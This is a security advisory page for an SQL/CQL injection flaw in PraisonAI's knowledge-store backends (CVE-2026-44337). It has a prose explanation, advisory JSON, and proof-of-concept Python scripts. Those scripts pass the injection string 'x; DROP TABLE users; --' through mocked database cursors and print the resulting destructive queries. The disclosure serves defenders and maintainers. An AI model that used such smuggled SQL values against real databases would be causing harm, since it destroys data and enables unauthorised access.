GHSA-3643-7V76-5CJ2

Vulnerability from github – Published: 2026-05-11 13:57 – Updated: 2026-05-11 13:57
VLAI?
Summary
PraisonAI knowledge-store backends interpolate unvalidated collection names into SQL and CQL queries
Details

Summary

PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated name and collection arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection.

Details

This issue affects the public persistence layer exported by persistence/init.py, which exposes KnowledgeStore and create_knowledge_store(). The factory wires the affected backends as supported knowledge-store providers in [persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:112):

The common root cause is that the KnowledgeStore interface accepts free-form collection names in create_collection(), delete_collection(), insert(), upsert(), search(), get(), delete(), and count() at [persistence/knowledge/base.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/base.py:44), but the affected backends interpolate those values directly into query text instead of validating or quoting them.

Representative sinks:

There is already an internal identifier validator in the conversation persistence layer:

That validator is used for SQL identifiers such as table_prefix and schema in the conversation stores, but no equivalent validation is applied in the affected knowledge-store backends.

Version scope:

  • pgvector.py and cassandra.py were already present by v2.4.1
  • singlestore_vector.py was present by v2.4.3
  • the current PyPI release on May 1, 2026 is 4.6.33, and the same interpolation patterns are still present

Scope note for maintainers: I did not identify a built-in PraisonAI HTTP endpoint that forwards external request data into these specific persistence methods. The issue is in the package's public persistence APIs and affects applications that pass untrusted collection names to the affected backends.

PoC

The following local reproductions show that attacker-controlled collection names become part of the executed SQL text.

  1. Reproduce the SingleStoreVectorKnowledgeStore.delete_collection() query construction:
python3 - <<'PY'
import importlib.util
import pathlib
import sys
import types

base = pathlib.Path("scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence")

mods = {
    "praisonai": types.ModuleType("praisonai"),
    "praisonai.persistence": types.ModuleType("praisonai.persistence"),
    "praisonai.persistence.knowledge": types.ModuleType("praisonai.persistence.knowledge"),
}
for k, v in mods.items():
    v.__path__ = []
    sys.modules[k] = v

def load(name, path):
    spec = importlib.util.spec_from_file_location(name, path)
    mod = importlib.util.module_from_spec(spec)
    sys.modules[name] = mod
    spec.loader.exec_module(mod)
    return mod

load("praisonai.persistence.knowledge.base", base / "knowledge" / "base.py")
ss = load("praisonai.persistence.knowledge.singlestore_vector", base / "knowledge" / "singlestore_vector.py")

class FakeCursor:
    def __init__(self, parent): self.parent = parent
    def execute(self, query, params=None): self.parent.calls.append((query, params))
    def __enter__(self): return self
    def __exit__(self, *args): return False

class FakeConn:
    def __init__(self): self.calls = []
    def cursor(self): return FakeCursor(self)

store = ss.SingleStoreVectorKnowledgeStore()
store._initialized = True
store._conn = FakeConn()
store.delete_collection("x; DROP TABLE users; --")
print(store._conn.calls[-1][0].strip())
PY

Observed result:

DROP TABLE IF EXISTS praisonai_x; DROP TABLE users; --
  1. Reproduce the PGVectorKnowledgeStore.create_collection() query construction:
python3 - <<'PY'
import importlib.util
import pathlib
import sys
import types

base = pathlib.Path("scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence")

mods = {
    "praisonai": types.ModuleType("praisonai"),
    "praisonai.persistence": types.ModuleType("praisonai.persistence"),
    "praisonai.persistence.knowledge": types.ModuleType("praisonai.persistence.knowledge"),
}
for k, v in mods.items():
    v.__path__ = []
    sys.modules[k] = v

def load(name, path):
    spec = importlib.util.spec_from_file_location(name, path)
    mod = importlib.util.module_from_spec(spec)
    sys.modules[name] = mod
    spec.loader.exec_module(mod)
    return mod

load("praisonai.persistence.knowledge.base", base / "knowledge" / "base.py")

psycopg2 = types.ModuleType("psycopg2")
extras = types.ModuleType("psycopg2.extras")
pool = types.ModuleType("psycopg2.pool")
class DummyPool:
    def __init__(self, *a, **k): pass
    def getconn(self): return None
    def putconn(self, c): pass
pool.ThreadedConnectionPool = DummyPool
extras.RealDictCursor = object
psycopg2.pool = pool
sys.modules["psycopg2"] = psycopg2
sys.modules["psycopg2.pool"] = pool
sys.modules["psycopg2.extras"] = extras

pg = load("praisonai.persistence.knowledge.pgvector", base / "knowledge" / "pgvector.py")

class FakeCursor:
    def __init__(self, parent): self.parent = parent
    def execute(self, query, params=None): self.parent.calls.append((query, params))
    def __enter__(self): return self
    def __exit__(self, *args): return False

class FakeConn:
    def __init__(self): self.calls = []
    def cursor(self): return FakeCursor(self)
    def commit(self): pass

store = pg.PGVectorKnowledgeStore(auto_create_extension=False)
conn = FakeConn()
store._get_conn = lambda: conn
store._put_conn = lambda c: None
store.create_collection("x; DROP TABLE users; --", 3)
for query, _ in conn.calls:
    print(query.strip())
PY

Observed result includes:

CREATE TABLE IF NOT EXISTS public.praison_vec_x; DROP TABLE users; -- (
CREATE INDEX IF NOT EXISTS idx_x; DROP TABLE users; --_embedding

The Cassandra backend follows the same pattern in its CREATE TABLE, DROP TABLE, INSERT, SELECT, and DELETE statements.

Impact

This issue affects applications that use PraisonAI's optional SQL/CQL knowledge-store backends and pass untrusted collection names into them.

Potential impact depends on backend and driver behavior, but includes:

  • malformed queries and backend errors
  • access to unintended tables or indexes
  • execution of attacker-influenced SQL or CQL text where the backend/driver accepts the resulting statement shape

I did not confirm direct exposure through PraisonAI's built-in HTTP server surfaces, so this is best understood as a vulnerability in the package's public persistence APIs rather than a turnkey remote exploit in the default application server.

Severity ?
6.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.6.33"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "PraisonAI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.1"
            },
            {
              "fixed": "4.6.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44337"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T13:57:18Z",
    "nvd_published_at": "2026-05-08T14:16:46Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nPraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated `name` and `collection` arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection.\n\n### Details\nThis issue affects the public persistence layer exported by [persistence/__init__.py](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/__init__.py:1), which exposes `KnowledgeStore` and `create_knowledge_store()`. The factory wires the affected backends as supported knowledge-store providers in [[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:112)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:162):112):\n\n- `pgvector` at [[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:170)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:186):162)\n- `cassandra` at [persistence/factory.py](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:170)\n- `singlestore_vector` at [persistence/factory.py](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:186)\n\nThe common root cause is that the `KnowledgeStore` interface accepts free-form collection names in `create_collection()`, `delete_collection()`, `insert()`, `upsert()`, `search()`, `get()`, `delete()`, and `count()` at [[persistence/knowledge/base.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/base.py:44)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/base.py:44), but the affected backends interpolate those values directly into query text instead of validating or quoting them.\n\nRepresentative sinks:\n\n- `SingleStoreVectorKnowledgeStore` builds `table_name = f\"{self.table_prefix}{name}\"` and executes raw DDL in [[persistence/knowledge/singlestore_vector.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/singlestore_vector.py:92)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/singlestore_vector.py:92). The same pattern is reused for `delete_collection`, `insert`, `upsert`, `search`, `get`, `delete`, and `count`.\n- `PGVectorKnowledgeStore` builds `public.praison_vec_{collection}` and `idx_{name}_embedding` directly into SQL in [[persistence/knowledge/pgvector.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/pgvector.py:82)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/pgvector.py:82).\n- `CassandraKnowledgeStore` interpolates `name` and `collection` directly into `CREATE TABLE`, `DROP TABLE`, `INSERT`, `SELECT`, `DELETE`, and `COUNT` statements in [[persistence/knowledge/cassandra.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/cassandra.py:73)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/cassandra.py:73).\n\nThere is already an internal identifier validator in the conversation persistence layer:\n\n- `validate_identifier()` only allows alphanumeric characters and underscores in [[persistence/conversation/base.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/conversation/base.py:18)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/conversation/base.py:18)\n\nThat validator is used for SQL identifiers such as `table_prefix` and `schema` in the conversation stores, but no equivalent validation is applied in the affected knowledge-store backends.\n\nVersion scope:\n\n- `pgvector.py` and `cassandra.py` were already present by `v2.4.1`\n- `singlestore_vector.py` was present by `v2.4.3`\n- the current PyPI release on May 1, 2026 is `4.6.33`, and the same interpolation patterns are still present\n\nScope note for maintainers: I did not identify a built-in PraisonAI HTTP endpoint that forwards external request data into these specific persistence methods. The issue is in the package\u0027s public persistence APIs and affects applications that pass untrusted collection names to the affected backends.\n\n### PoC\nThe following local reproductions show that attacker-controlled collection names become part of the executed SQL text.\n\n1. Reproduce the `SingleStoreVectorKnowledgeStore.delete_collection()` query construction:\n\n```bash\npython3 - \u003c\u003c\u0027PY\u0027\nimport importlib.util\nimport pathlib\nimport sys\nimport types\n\nbase = pathlib.Path(\"scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence\")\n\nmods = {\n    \"praisonai\": types.ModuleType(\"praisonai\"),\n    \"praisonai.persistence\": types.ModuleType(\"praisonai.persistence\"),\n    \"praisonai.persistence.knowledge\": types.ModuleType(\"praisonai.persistence.knowledge\"),\n}\nfor k, v in mods.items():\n    v.__path__ = []\n    sys.modules[k] = v\n\ndef load(name, path):\n    spec = importlib.util.spec_from_file_location(name, path)\n    mod = importlib.util.module_from_spec(spec)\n    sys.modules[name] = mod\n    spec.loader.exec_module(mod)\n    return mod\n\nload(\"praisonai.persistence.knowledge.base\", base / \"knowledge\" / \"base.py\")\nss = load(\"praisonai.persistence.knowledge.singlestore_vector\", base / \"knowledge\" / \"singlestore_vector.py\")\n\nclass FakeCursor:\n    def __init__(self, parent): self.parent = parent\n    def execute(self, query, params=None): self.parent.calls.append((query, params))\n    def __enter__(self): return self\n    def __exit__(self, *args): return False\n\nclass FakeConn:\n    def __init__(self): self.calls = []\n    def cursor(self): return FakeCursor(self)\n\nstore = ss.SingleStoreVectorKnowledgeStore()\nstore._initialized = True\nstore._conn = FakeConn()\nstore.delete_collection(\"x; DROP TABLE users; --\")\nprint(store._conn.calls[-1][0].strip())\nPY\n```\n\nObserved result:\n\n```text\nDROP TABLE IF EXISTS praisonai_x; DROP TABLE users; --\n```\n\n2. Reproduce the `PGVectorKnowledgeStore.create_collection()` query construction:\n\n```bash\npython3 - \u003c\u003c\u0027PY\u0027\nimport importlib.util\nimport pathlib\nimport sys\nimport types\n\nbase = pathlib.Path(\"scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence\")\n\nmods = {\n    \"praisonai\": types.ModuleType(\"praisonai\"),\n    \"praisonai.persistence\": types.ModuleType(\"praisonai.persistence\"),\n    \"praisonai.persistence.knowledge\": types.ModuleType(\"praisonai.persistence.knowledge\"),\n}\nfor k, v in mods.items():\n    v.__path__ = []\n    sys.modules[k] = v\n\ndef load(name, path):\n    spec = importlib.util.spec_from_file_location(name, path)\n    mod = importlib.util.module_from_spec(spec)\n    sys.modules[name] = mod\n    spec.loader.exec_module(mod)\n    return mod\n\nload(\"praisonai.persistence.knowledge.base\", base / \"knowledge\" / \"base.py\")\n\npsycopg2 = types.ModuleType(\"psycopg2\")\nextras = types.ModuleType(\"psycopg2.extras\")\npool = types.ModuleType(\"psycopg2.pool\")\nclass DummyPool:\n    def __init__(self, *a, **k): pass\n    def getconn(self): return None\n    def putconn(self, c): pass\npool.ThreadedConnectionPool = DummyPool\nextras.RealDictCursor = object\npsycopg2.pool = pool\nsys.modules[\"psycopg2\"] = psycopg2\nsys.modules[\"psycopg2.pool\"] = pool\nsys.modules[\"psycopg2.extras\"] = extras\n\npg = load(\"praisonai.persistence.knowledge.pgvector\", base / \"knowledge\" / \"pgvector.py\")\n\nclass FakeCursor:\n    def __init__(self, parent): self.parent = parent\n    def execute(self, query, params=None): self.parent.calls.append((query, params))\n    def __enter__(self): return self\n    def __exit__(self, *args): return False\n\nclass FakeConn:\n    def __init__(self): self.calls = []\n    def cursor(self): return FakeCursor(self)\n    def commit(self): pass\n\nstore = pg.PGVectorKnowledgeStore(auto_create_extension=False)\nconn = FakeConn()\nstore._get_conn = lambda: conn\nstore._put_conn = lambda c: None\nstore.create_collection(\"x; DROP TABLE users; --\", 3)\nfor query, _ in conn.calls:\n    print(query.strip())\nPY\n```\n\nObserved result includes:\n\n```text\nCREATE TABLE IF NOT EXISTS public.praison_vec_x; DROP TABLE users; -- (\nCREATE INDEX IF NOT EXISTS idx_x; DROP TABLE users; --_embedding\n```\n\nThe Cassandra backend follows the same pattern in its `CREATE TABLE`, `DROP TABLE`, `INSERT`, `SELECT`, and `DELETE` statements.\n\n### Impact\nThis issue affects applications that use PraisonAI\u0027s optional SQL/CQL knowledge-store backends and pass untrusted collection names into them.\n\nPotential impact depends on backend and driver behavior, but includes:\n\n- malformed queries and backend errors\n- access to unintended tables or indexes\n- execution of attacker-influenced SQL or CQL text where the backend/driver accepts the resulting statement shape\n\nI did not confirm direct exposure through PraisonAI\u0027s built-in HTTP server surfaces, so this is best understood as a vulnerability in the package\u0027s public persistence APIs rather than a turnkey remote exploit in the default application server.",
  "id": "GHSA-3643-7v76-5cj2",
  "modified": "2026-05-11T13:57:18Z",
  "published": "2026-05-11T13:57:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44337"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI knowledge-store backends interpolate unvalidated collection names into SQL and CQL queries"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.